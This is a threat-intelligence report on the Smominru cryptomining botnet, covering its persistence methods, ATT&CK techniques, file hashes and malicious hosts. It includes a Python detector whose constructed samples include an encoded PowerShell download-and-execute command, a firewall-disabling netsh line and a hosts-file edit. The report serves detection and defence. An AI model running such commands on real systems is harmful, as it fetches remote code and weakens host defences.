Carbon Black’s Threat Analysis Unit (TAU) and CB ThreatSight discovered the resurgence of a previously active cryptomining botnet campaign called Smominru. This campaign has evolved since its original discovery in the latter half of 2017 and now leverages new techniques including LOLbins, polymorphic malware, repackaged/modified malware, open-source exploits, credential theft, and data exfiltration. The botnet has victims worldwide but primarily targets Asia and Europe. The campaign primarily relies on EternalBlue scanning for lateral movement. Though complex in nature, the vast majority of the commands used by the campaign are either base64 encoded or in plain text.
(Carbon Black’s full report on this campaign may be downloaded here.)
Behavioral Summary
The behaviors associated with this botnet are very noisy. Cb Defense will generate multiple alerts covering a multitude of TTPs. Alert priority will vary, but typically ranges from 5 to 8 depending on the degree of overlap between the malware and its associated behaviors.
Exhibit A: Noisy Malware Alert with Associated TTPs
Details
Multiple child processes are dropped and/or invoked by the first-stage malware. File extensions include, but are not limited to, .exe, .rar, .ps1, .vbs, .bat, .py, .sct, .jpg, and .txt. PowerShell is the primary vector used to download hardcoded second- and third-stage payloads onto victim machines.
The observed persistence mechanisms include the following:
- Windows Management Instrumentation (WMI) to invoke PowerShell with base64 encoded commands to download additional malicious code
- WMI event filter subscriptions to trigger malicious code execution
- Scheduled task creation (and deletion)
- DNS poisoning
- Firewall tampering
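The persistence mechanisms above all leave traces in process-creation telemetry. The following detection logic, added here as an illustration and not part of Carbon Black's report or tooling, tags constructed Sysmon-style events (parent image, image, command line) that match them: PowerShell spawned by the WMI provider host, `-EncodedCommand` payloads (decoded from the UTF-16LE base64 PowerShell expects) that contain download primitives, schtasks create/delete calls, netsh firewall changes, and hosts-file edits (assumed here as one way "DNS poisoning" would surface; the report does not say how it is done). All sample events, paths and the `example.invalid` hostname are constructed.

```python
import base64
import re

def encode_for_powershell(script):
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")  # UTF-16LE then base64, as -EncodedCommand expects

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload from a command line, or None if absent or invalid."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_event(parent, image, cmdline):
    """Tag one process-creation event with the behaviours listed above; [] means nothing matched."""
    tags = []
    low = cmdline.lower()
    img = image.lower().rsplit("\\", 1)[-1]   # basename of the created process
    par = parent.lower().rsplit("\\", 1)[-1]  # basename of its parent
    if img == "powershell.exe":
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            tags.append("encoded_powershell")
            if re.search(r"downloadstring|downloadfile|invoke-webrequest", decoded, re.IGNORECASE):
                tags.append("powershell_download")
        if par == "wmiprvse.exe":              # WMI provider host invoking PowerShell
            tags.append("wmi_spawned_powershell")
    if img == "schtasks.exe" and re.search(r"/(create|delete)\b", low):
        tags.append("scheduled_task_change")
    if img == "netsh.exe" and "firewall" in low:
        tags.append("firewall_tampering")
    if "drivers\\etc\\hosts" in low:           # hosts-file edit, assumed here as a DNS poisoning method
        tags.append("hosts_file_modification")
    return tags

def triage(events):
    """Return (command line, tags) for every event that matched at least one behaviour."""
    return [(c, t) for p, i, c in events if (t := classify_event(p, i, c))]

# Constructed sample events (parent image, image, command line); not real Smominru telemetry.
SAMPLE_EVENTS = [
    ("WmiPrvSE.exe", "powershell.exe", "powershell.exe -NoP -W Hidden -EncodedCommand "
     + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/n.vbs')")),
    ("cmd.exe", "schtasks.exe", "schtasks /create /sc minute /mo 1 /tn Update /tr C:\\Windows\\Temp\\msief.exe"),
    ("cmd.exe", "netsh.exe", "netsh advfirewall set allprofiles state off"),
    ("cmd.exe", "cmd.exe", "cmd /c echo 127.0.0.1 update.example.invalid >> C:\\Windows\\System32\\drivers\\etc\\hosts"),
]
```

Running `triage(SAMPLE_EVENTS)` returns each of the four constructed events with its tags; a benign event such as notepad.exe opening a text file returns no tags and is dropped.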
Exhibit B: Smominru Behavioral Spider Graph
Indicators of Compromise (IOCs)
MITRE ATT&CK TIDs
TID | Tactic | Description |
---|---|---|
T1064 | Defense Evasion, Execution | Scripting |
T1496 | Impact | Resource Hijacking |
T1041 | Exfiltration | Exfiltration Over Command and Control Channel |
T1043 | Command and Control | Commonly Used Port |
T1497 | Defense Evasion, Discovery | Virtualization/Sandbox Evasion |
T1040 | Credential Access, Discovery | Network Sniffing |
T1003 | Credential Access | Credential Dumping |
T1047 | Execution | Windows Management Instrumentation (WMI) |
T1027 | Defense Evasion | Obfuscated Files or Information |
T1035 | Execution | Service Execution |
T1112 | Defense Evasion | Modify Registry |
T1053 | Persistence | Scheduled Task |
T1222 | Defense Evasion | File Permissions Modification |
T1117 | Defense Evasion, Execution | Regsvr32 (Regsvr32.exe loads COM scriptlets to execute DLLs) |
T1107 | Defense Evasion | File Deletion |
T1177 | Execution, Persistence | LSASS Driver |
T1084 | Persistence | Windows Management Instrumentation Event Subscription |
T1059 | Execution | Command-Line Interface (cmd execution) |
T1050 | Persistence, Privilege Escalation | New Service |
T1132 | Command and Control | Data Encoding (PowerShell base64 encoded commands) |
T1031 | Persistence | Modifying Existing Service |
T1086 | Execution | PowerShell |
Endpoint Indicators
Process(es) | SHA-256 Hash(es) | Context |
---|---|---|
csrs.exe | 4958c38ba2d7def9ba44c5382f2c5a41c619d5a5eedfb8ac4697dbf75c306933 | Python-compiled EternalBlue executable |
u.exe | 46bc86cff88521671e70edbbadbc17590305c8f91169f777635e8f529ac21044 | First- or second-stage malware |
upsupx.exe | 790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd | First-stage cryptominer |
item.dat | ae161e582de9ec380b3e0b295effd62eb8889ac35bc6631a9492cf41563ed14a | Supporting file |
msinfo.exe | 7ec433dd0454553b09f11c39944e251e3ee32e4981f52f02adc3011eb0ce6537 | Invokes clean-up scripts |
anydesk.exe | 2038dfd46f837540cd417cd09e48478b1a72f913f6c6e0797dceda93ffb1dc4a | EternalBlue scanner |
64.exe / lsmosee.exe / max.exe / ok.exe | fea935d2d0fb1abadb900f009b4c40bb8a91fd9e25cc76ed4f9dae08960566d5 | VM detection, DNS poisoning, modified cacls (various) |
sqlservr.exe | 5e86200a75b2e5878f521d02bfbdef59d4d2421a5f2425482e0e07fba5d3a749 | XMR miner |
msief.exe | 4755feca6fc53283a6a4a2b2dc8a5885470ce9465c5f827400b498d5f433bea8, 2ee3cefa345dc5b6e1e459d4a3bb8bb9dd0de0d54b28392bc117448d20e4de5e, e00b60e17f6788b7e3ac0e6db5d9abc32938018f1caec4069af4c252c52becd2 | Second-stage malware |
n.vbs | 4e886a70b4c097bbd0feab3b2a1dbaa8e1a305f2d1c9b1745f7e9b6b5c8392c9, 8250fe8f8ba817301fb439e9c40e660425e647898ddfa92859b32cada024b2b2 | Invoked script |
c3.bat | 18025e55b789a161401b7c0ce8f14a45cf50a44d70633db7b4e78b44ab7ec476, 51d975005204f78a93a37ef2ecd6b64706f6274043e658407d590ee52d8b87a7, 0a8b929cfab2dfdf3b5340949425db7a90e0fa53dcdd3da72afce8ebdda89efb, 132df91bb042f91aedc3a18ce3ed2a09fa4e0f46309e6b6fd956e23fad6a04a3 | Clean-up script |
mscorsvwx.exe | 9e1bf70e006000b3005e04f52be024a5b695e016e9c90c529d10c66ebc851d13 | Scrapes lsass.exe |
cpnyprroi.exe (polymorphic) | cc396d1e22e94a7a20fe9a4da31c89d4930b8d2f01a7e79241c5b10b9c2159ad | Polymorphic malware |
lsmm.exe | 8246293a368a1da86aba696bea93460705ca4c40aa4c75dde909b8d9dff5efcb | Modified Xmrig.exe miner |
Known System DNS or IP | Context |
---|---|
wmi.1217bye.host | Server: Microsoft-IIS/7.5 |
213.183.60.7 | No longer accessible |
173.208.139.170 | Server: Microsoft-IIS/7.5 |
35.182.171.137 | No longer accessible |
223.25.247.240 | Server: Microsoft-IIS/7.5 |
174.128.248.10 | No longer accessible |
garrafa8.itaucredicard.tk | Server: nginx |
2019.ip138.com | Server: Microsoft-IIS/6.0 |
pc.pc0416.xyz | Server: Microsoft-IIS/7.5 |
103.213.246.23 | hosted malware files |
173.247.239.186 | hosted malware files |
185.112.156.92 | hosted malware files |
198.148.90.34 | hosted malware files |
208.51.63.150 | hosted malware files |
223.25.247.240 | hosted malware files |
45.58.135.106 | hosted malware files |